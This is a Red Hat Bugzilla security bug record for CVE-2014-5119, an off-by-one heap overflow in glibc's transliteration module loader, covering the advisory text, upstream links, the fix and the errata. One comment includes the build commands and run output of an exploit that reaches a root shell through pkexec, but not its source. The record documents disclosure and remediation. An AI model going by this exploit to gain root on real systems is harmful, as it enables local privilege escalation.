Bug 1119128 (CVE-2014-5119)
| Field | Value |
|---|---|
| Summary | CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find() |
| Product | [Other] Security Response |
| Reporter | Murray McAllister <mmcallis> |
| Component | vulnerability |
| Assignee | Red Hat Product Security <security-response-team> |
| Status | CLOSED ERRATA |
| QA Contact | |
| Severity | high |
| Docs Contact | |
| Priority | high |
| Version | unspecified |
| CC | agk, ashankar, baumanmo, bhubbard, brwillia, btotty, carnil, codonell, dwalsh, fweimer, hartsjc, jakub, jrusnack, kabbott, karlamrhein, klamb, law, michele, mitr, pablo.iranzo, pfrankli, pkoro, rbarlow, rfreire, rhaggard, rjsm, sauchter, sbeal, seldridg, spoyarek, sroza, taviso, vanhoof, vdanen, vkaigoro |
| Target Milestone | --- |
| Keywords | Security |
| Target Release | --- |
| Hardware | All |
| OS | Linux |
| URL | https://sourceware.org/ml/libc-alpha/2014-08/threads.html#00352 |
| Whiteboard | |
| Fixed In Version | |
| Doc Type | Bug Fix |
| Doc Text | An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application. |
| Story Points | --- |
| Clone Of | |
| Environment | |
| Last Closed | 2014-08-29 21:50:01 UTC |
| Type | --- |
| Regression | --- |
| Mount Type | --- |
| Documentation | --- |
| CRM | |
| Verified Versions | |
| Category | --- |
| oVirt Team | --- |
| RHEL 7.3 requirements from Atomic Host | |
| Cloudforms Team | --- |
| Target Upstream Version | |
| Embargoed | |
| Bug Depends On | 1129745, 1133807, 1133808, 1133809, 1133810, 1133811, 1133812, 1134210, 1134211, 1134212, 1134213 |
| Bug Blocks | 1119129, 1129744 |
| Attachments | |
Description
Murray McAllister
2014-07-14 05:30:08 UTC
MITRE assigned CVE-2014-5119 to this issue: http://seclists.org/oss-sec/2014/q3/358

Upstream bug: https://sourceware.org/bugzilla/show_bug.cgi?id=17187

*** Bug 1129743 has been marked as a duplicate of this bug. ***

Further information from Tavis Ormandy: https://sourceware.org/ml/libc-alpha/2014-07/msg00590.html

Created attachment 930687 [details]
CVE-2014-5119 exploit for Fedora 20 32-bit

It's been a few months without progress, here's an exploit.

```
$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@localhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pkexploit.c -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pty.c -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -c -o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@localhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing /: File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit
```

Statement: (none)

Reference:
http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
https://code.google.com/p/google-security-research/issues/detail?id=96

Upstream commit: https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=a1a6a401ab0a3c9f15fb7eaebbdcee24192254e8

It removes affected functionality - support for loadable gconv transliteration modules - which was non-functional for a long time.

IssueDescription:
An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.

This issue has been addressed in the following products:
Red Hat Enterprise Linux 5
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Via RHSA-2014:1110 https://rhn.redhat.com/errata/RHSA-2014-1110.html

This issue has been addressed in the following products:
Red Hat Enterprise Linux 5.6 Long Life
Red Hat Enterprise Linux 5.9 EUS - Server Only
Red Hat Enterprise Linux 6.2 AUS
Red Hat Enterprise Linux 6.4 EUS - Server and Compute Node Only
Via RHSA-2014:1118 https://rhn.redhat.com/errata/RHSA-2014-1118.html